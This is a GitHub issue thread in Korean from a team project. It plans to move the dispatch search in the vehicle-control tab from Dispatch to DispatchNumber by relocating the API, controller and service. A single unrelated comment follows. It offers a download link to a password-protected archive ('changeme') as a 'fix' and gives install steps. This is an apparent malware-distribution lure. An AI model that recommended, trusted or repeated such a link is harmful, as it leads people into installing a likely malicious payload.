### ISSUE TITLE
차량관제 탭, 배차 조회 검색 위치 이동

### ISSUE THREAD

**Issue by myoungjin-kim** [FastCampus-Final-Group2/finalproject_server#49]
### 🛠️ 작업 대상

차량관제 탭, 배차 조회 검색
Dispatch -> DispatchNumber로의 이동

### ✅ 작업 내용

- api 변경
- controller 위치 이동
- service 위치 이동

### ⏳ 추정 개발 시간

비관적: ~ 8/27
낙관적: ~ 8/27

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
